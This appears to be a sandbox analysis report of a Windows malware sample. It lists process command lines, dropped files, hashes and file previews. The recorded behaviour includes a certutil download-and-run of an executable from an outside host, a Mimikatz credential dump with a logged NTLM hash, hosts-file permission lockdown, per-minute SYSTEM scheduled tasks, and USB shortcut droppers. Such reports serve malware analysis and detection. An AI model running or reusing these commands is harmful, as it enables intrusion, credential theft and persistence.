cmd.exe (PID: 1896 cmdline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2560 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 2864 cmdline: ping 127.0.0.1 -n 8 MD5: 70C24A306F768936563ABDADB9CA9108)

b158ac7.exe (PID: 5060 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)

cmd.exe (PID: 4080 cmdline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe

MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

certutil.exe (PID: 3304 cmdline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe MD5:

D056DF596F6E02A36841E69872AEF7BD)sqlisrv.exe (PID: 652 cmdline: C:\Windows\Temp\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)

ycemck.exe (PID: 3268 cmdline: C:\Windows\SysWOW64\ycemck.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)

b158ac7.exe (PID: 3356 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)

cmd.exe (PID: 3968 cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrat

ors & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1576 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 4728 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)


cacls.exe (PID: 3632 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)


cacls.exe (PID: 1252 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)


vfshost.exe (PID: 4240 cmdline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit MD5:

FD5EFCCDE59E94EEC8BB2735AA577B2B)netsh.exe (PID: 4864 cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)


netsh.exe (PID: 1784 cmdline: netsh ipsec static add filteraction name=BastardsList action=block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)


cmd.exe (PID: 4068 cmdline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5:

F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GogoleUpadte.exe (PID: 284 cmdline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5:

821EA58E3E9B6539FF0AFFD40E59F962)cmd.exe (PID: 1252 cmdline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate

\log.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)cmd.exe (PID: 1524 cmdline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5:


ouousbpro.exe (PID: 2940 cmdline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5: C02C8BE9AFC220F8B7852C619AF784C6)

cmd.exe (PID: 1644 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe' MD5:


cmd.exe (PID: 4448 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p every

one:F' MD5: F3BDBE3BB6F734E357235F4D5898582D)cleanup


Process: C:\Windows\SysWOW64\certutil.exe

File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

Size (bytes): 4672000

Entropy (8bit): 7.82218228744185

Encrypted: false

MD5: 1328C9CC50BD324399B4A83CA043BE6E

SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3

SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7

SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2

Malicious: true

Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....

Created / dropped Files



C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C4E91F59715AA0FB54843EB617B4C0B5Process: C:\Windows\SysWOW64\certutil.exe

File Type: data

Size (bytes): 220

Entropy (8bit): 2.9443655208446446

Encrypted: false

MD5: 1E600A0593C90A99148F16ECD4418654

SHA1: D489E9D2F74199D5C9EEFA91FEF427CF9682C2B2

SHA-256: 629899EA69863F8D6B31B2F55A83CD752DD127F0E7DCE716A7BC037501DD44C8

SHA-512: 37D907C38F0651CF4E3E09F46E73AE65C02FBCF88DDD9EC75039446AFDCECBEEC81840FE18D22D90CE0DF71DAC0ECB002B4AAFC00A176B7EC03A0D8C4B724C75

Malicious: false

Preview: p...... ....D...^...E...(....................................................... .................$............JG.h.t.t.p.:././.f.i.d...h.o.g.n.o.o.b...s.e./.s.q.l.i.s.r.v...e.x.e...".5.c.d.b.1.c.b.3.-.4.7.4.a.0.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe




Entropy (8bit): 7.82218228744185

Encrypted: false

MD5: 1328C9CC50BD324399B4A83CA043BE6E




Malicious: true



C:\WebKitSdk\2.25.14\qwr4rt.exe

Process: C:\Users\user\Desktop\download.exe

File Type: PE32 executable (GUI) Intel 80386, for MS Windows

Size (bytes): 73728

Entropy (8bit): 5.192189717439081

Encrypted: false

MD5: EABDC54C61088B769E9AF917AA6B05A4

SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6

SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F

SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997

Malicious: true

Antivirus: Antivirus: Avira, Detection: 100%Antivirus: virustotal, Detection: 79%, Browse

Joe Sandbox View:

Filename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, Browse

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\WebKitSdk\2.25.14\sqlisrv.exe

Process: C:\Users\user\Desktop\download.exe



Entropy (8bit): 7.82218228744185

Encrypted: false

MD5: 1328C9CC50BD324399B4A83CA043BE6E
















Malicious: true



C:\WebKitSdk\2.25.14\sqlisrv.exe

C:\Windows\5c2a55da8\Corporate\log.txtProcess: C:\Windows\5c2a55da8\Corporate\vfshost.exe

File Type: ASCII text, with CRLF line terminators

Size (bytes): 5272

Entropy (8bit): 5.000983475329759

Encrypted: false

MD5: 87C4B9B38AD26CE7D75AE5CBB5AB70CD

SHA1: 14AA5100593F4FF4B1442B8DBE1B82AF366FA572

SHA-256: 8D30C28FD9CAD4C41F3B08EBCF1CFCDB43696EEA36402EF61DBFC47EBF049752

SHA-512: BB4AD8C37ADBAAE57C8316463E2FDAA2C038F7B2371A1CE9F2183462FFAE111C47178C2583F269DB8FF0935DF182E23F866655F0E6614FAA56A8CAE21F46B9FD

Malicious: false

Yara Hits: Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Windows\5c2a55da8\Corporate\log.txt, Author: Florian Roth

Preview: .. .#####. mimikatz 2.1.1 (x64) built on Aug 20 2018 01:54:02.. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **.. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ).. ## \ / ## > http://blog.gentilkiwi.com/mimikatz.. '## v ##' Vincent LE TOUX ( [email protected] ).. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/....mimikatz(commandline) # privilege::debug..Privilege '20' OK....mimikatz(commandline) # sekurlsa::logonpasswords....Authentication Id : 0 ; 109316 (00000000:0001ab04)..Session : Interactive from 1..User Name : user..Domain : user-PC..Logon Server : user-PC..Logon Time : 11/22/2018 12:34:47 PM..SID : S-1-5-21-58933367-3072710494-194312298-1002...msv :.... [00000003] Primary... * Username : user... * Domain : user-PC... * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0... * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709.

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_D.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe

File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=

Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 8CA1464A51A29D015663DC3E791C3A83

SHA1: 9E4C24A28F425E36105C1F4ED1ECCACC8E8CC751

SHA-256: CE82A1ACA23C7819E58743C6FED2ACB13BB3BE2568F3AD610F9F5C0ECC152B6E

SHA-512: FFA458ED752BCCA8081D978861695DCBBD3D359B91B731E3E02B3A390BCA5D390579CADFA57A50FCE2BA6E4B3AFEB6667A618489B1D55BE9BE56A514822A5228

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........D.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_E.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: B315CFEF01CEED20917E37FC8F27B4F8

SHA1: F559AC1E0B32D1620348BBA10EDC4590C511B1E6

SHA-256: F4340A46A82EFF16B9162D126235D514BBBA60B0E97100DCB372D6FA9DA04C48

SHA-512: 7BC148A312415E6911B0EC78B690935B2CA6D35B10E852B7708C0A9324267F2E376B2A770ACAAEE97934E04B903C1FFC0D7730D1E60B4AB6662DB0BA7D3EE8EE

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........E.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_F.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278



Entropy (8bit): 2.8032648063611956

Encrypted: false

MD5: 16EA7A2144E345FF3672977A4FB34987

SHA1: DF653DD612BFD0727FE3192601BA4DD3C6A9C60D

SHA-256: 52D00D6377B0E519A2EFFA3BBBD0E954E5AA04C7E6DE982C412D2A13F375B26C

SHA-512: 84BB329E1DA9C52A23C01A12CF205CC1AE3498B8F658EF4738A878473373AB82522CB35AC57A0AC616DA6F837192C0FEF6B404A711B922373CD001B7D9255525

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........F.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_F.lnk

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_G.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 5EFD382C6D4DC1A40350C35F305F26CA

SHA1: 3BD8240E9F1714360AF78D9781D690D78D075A58

SHA-256: 127D4531E464015A1E7F6E634902D165F4BE1AC13D1E72ED76003AEA1C647D03

SHA-512: E402B7283DD9256EB00F00AF4D1813518598560A9932C08F8A19282817C2AD6B454F13592C09C2BF5E15AAA9526FEF460FB9AEA64C5184E2C137D3403DFFB217

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........G.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_H.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 9E61781A23A323B787416E39B72B7A85

SHA1: E79349938938FB31B09DA0AB7C2858DB841D1CC8

SHA-256: 8CF1C6A97DDE0555E0F6B49103381713631A4493904A8375AD5D6D0937FBD3C2

SHA-512: 6768FDAB99D489043282C7ED72B6FC8F5CCD745E2066738FA6B3F47F2EDC687A3583800499B0EFAFB1AEBEDB6BE38AC78C6F00D81146F061471AFAA8CE8345F6

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........H.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_I.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: B350D7FCC319AAD19C5B1F0D05755D80

SHA1: 3D72504461902E443DB9799684E639F22349E965

SHA-256: CD0EE50E6C1C66C13BF74A79B5B7CDBEB663D4AC8484F6DDD9512933ECC9B8ED

SHA-512: F7C0AD5E51524C90D66B531C7DD4D00B6F5304F595705A15723915FE83CF8C044E121A3A82098DCB8432BB209597B06F11B17772CA1F105A345336C9107ADBB4

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........I.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_J.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 37EDF73CE2E3EA5F59644C457DEAF1BD

SHA1: B4C19996C04BA410122055ECE1BF1FF8F8FDE446

SHA-256: 52C90EAE20FB1F066B72598677E4B172EB2B84260890EAAADD1667A3F5389D28

SHA-512: F9049B1FC912142CE60820686701F7B2B7064DDD27239F54B83B6EC41FD979BAA61E38B04F9C0CF7C1D2FF16BC8E9ECA9C1E7873E24327470D5EDCB5D87B7D32


Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........J.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_J.lnk

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_K.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 8EBAFFDDD3BFDC7F2B265A6604800613

SHA1: A3682A4115ADF7E6C3839F4992341B17673E2EBA

SHA-256: 802B61F6C41910DC9342DB2C16C931722529DA8B008D14123D3DEFCAE29484DD

SHA-512: 602CB155FF580922DE09264E679ECFE29016454809D36B73504347CD05E2C58645A3D0C1A2E5EDE49152B35C5BB9B60E3E45511D6DFDF279039147589C71FD09

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........K.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_L.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.806339457340596

Encrypted: false

MD5: E27FDB6477D3919C253435F27C9F8627

SHA1: 53C66BF3A87F611F7BDCDFA06A0904D59FEC8FE1

SHA-256: 9FE20B026B84E71E92A5A5ED0B54063F28C6211DF39F347D0BADE87D4E77BDBF

SHA-512: 984059A33CCAD5193C774C541D097CB72AC28F5CA41DC6A34C57D8CE911475FE8179D878D3617A1F3E4249C64C6D9EC159CC66E6B8514F4CCF4924EF40DE6AB9

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........L.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_M.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8090548800102484

Encrypted: false

MD5: 9262E8951D00DD0C682F9ACDF8FFD2EE

SHA1: 3BAB200214281E46E9653D0D927A0CC04588FE4C

SHA-256: A729EAFFA3FA864B6BF6814994FA4D3B2E63C5365B40490EB858CD44BD098CCF

SHA-512: 163BB42ED4F2A52EB11559F6FC7AFCC5B24935267D611A055DB1C71B5D086AB95FD15F6A5772EDF5AC1B8CFDFEDF748111DE3D4DC0FD9F3AD5AE1BACA7FE6B82

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........M.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_N.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 198B21D41A4406D33AEE2FC4B5EC63E2

SHA1: 8C64BB545D1FC87D272928D9A655A5556290123A

SHA-256: 659518BB55F1C67FECE48E51E0931EEC2938909354E26C39185079B44F81B5CC

SHA-512: 2628E8BEF47CFA428CAC3F8330A7F577192F70F8C9FE71FA6F47377DF25B7A35E8ED57040DC7D86A31F0E4F77CF5E05BA3285A31C64315A0740C35F85EE136BD

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........N.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_O.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe



Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: FF5D147F73D448E3DAFAB5CCDF42E7A9

SHA1: C7FD4C857A9D9E5DD2FFB2C2719B5B18AFCC6C20

SHA-256: 762B4AA976AD0B1BD0A7733E9004BF05E1FD0220E918462870FC033ADC7E113D

SHA-512: A992AE04BBBDBDE1D62D5B3D2515064F776E2E061EFFEAFA43315B670D11D463086248634A566F76B9CBDB257F1105B8EAAA4D58F484E191691C749EDC71A204

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........O.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_O.lnk

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_P.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8032648063611956

Encrypted: false

MD5: 5693BA4532491DB73BC63882C0030431

SHA1: 9766D313374AD5BEA9ED9FB2A09EC7C070AF256E

SHA-256: 4A2C45D879ABD67B0BFFF4DECB8940DC63CE72E4558DFA536B18C8751E7DC6F0

SHA-512: 213587F2F9E6218D874CC68953BD5E925946E066FF4D0615061A349D2BB91C0D28F19E8BCC19435BF1AA1C95C612E3485E6C523AA6FB2363659440BAC09256B8

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........P.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Q.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 6894AADED7EE80FE8C5219516D00B31F

SHA1: EAD35204149EE8DFA58958B5D2CB163070550EA2

SHA-256: 111F84171BE589592BB24D703C3D651E886F7DE419FA3C1AD61425C8163FD207

SHA-512: 90B7665E09554E26FBA794F97C3E46363A3511F9FA5D438B6DDEC905EAB2493F6D1A08F3C9A29D1FAFA06AAF2E4378E2CC14101F2B78341CF2E8A343F20048A6

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........Q.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_R.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: 85DD38FD6FED65B649EA17BC745C1BEB

SHA1: 68742429FB3C5959439FA46BB2DF487BF9566103

SHA-256: 3204F0143A2C8842F26A0732DF797D1A54A23E7998903062FE9D763C417E4D69

SHA-512: 59A010CA8B50FD316357C84743BCC7B525677DE376448ABF68D82F191A819D379FE6492FF092594F2A2E8D3CE2E23BCA8FA29B938D0D686881D54AE7C51E2A79

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........R.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_S.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8090548800102484

Encrypted: false

MD5: 764F62436E973E7855356A1E64C3FAE5

SHA1: DB35DE551C409ADD0896F3CF091EFCDFCAE167FA

SHA-256: 73B87B180D30F04CC4BA83D41E12D073BDB62D9AD9130DF5D784F98098D20F92


SHA-512: 13898FA6F1271E3798F5F5943D686ABF75A0206475ED7E68F97E13C265F50097705E62B28E4BA6537EC8DB3D9DBF7D9A2DD61E1BDB9057057CF09288CC8F1FF5

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........S.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_S.lnk

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_T.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: E9D4CFAE3C56B40CF5758743778307C6

SHA1: F4BEA6D7FF1CA26194E205ECBB3741D0975A18ED

SHA-256: 80C64F45A233D379221BE4E7B01AFB61244C19AB2B26B76CC72D4B694734E8FC

SHA-512: 66154E1D424326EDAF69CC0079B3A0ECCFEAB90935A1D11E19C8E5E7259135286E39FFE7EF4A1AA27CE59C11E30D8AB03CE8294D13F18DB9F13D6777D8073EB1

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........T.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_U.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: E28A46264870A35CF06F2B798F770F2D

SHA1: 3FD7C6E923DC63294853E6FCA0AC02101A3786EB

SHA-256: F4D6C03D9D64CB25A5BF14E23F25D35652D890A8C5F3D1B82D9D2DEA638DAD0A

SHA-512: 63DFC6EA564FDD4C675354BE5433B697BB60E6BA5B28C2673FFBD49FC02129F73DD51B4D8EC02DEB575A130CE7EEA0C573A407D10694F145BC8C9FABC3324224

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........U.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_V.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: A8576FA76A7B5CB76620436000BFA3AA

SHA1: BD01A08CEA2CF0F6243A4089B2C4C85FB9CCC529

SHA-256: 1E2E27EBF40A38CCC008DCF8C39A5B6DDCECDB97CA253780467778196227E3EF

SHA-512: 37ADFA7F9F6E8C802C2452EB00243D24D7983DA072900771AF57F0D0562DC3B3541D57AF30E78AF14103A28E92494DCDF770EA6545C221FEF71A61AA2C745625

Malicious: false

Preview: L..................F.............................................................. .!.:i.....+00..............j..........V.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................

C:\Windows\5c2a55da8\usbprohub\FlashPlayer_W.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Size (bytes): 278

Entropy (8bit): 2.8162491246145653

Encrypted: false

MD5: B14D6F788920C6A554FF70B0A1BE95A5

SHA1: 6EB5F7B2FA96B9C7D70B70C221A21BB8F46590CB

SHA-256: AF15AE9ACF48284AA88182D56E1E7FEE1DEC638FCBFCF9B7E7413756A4D2857D

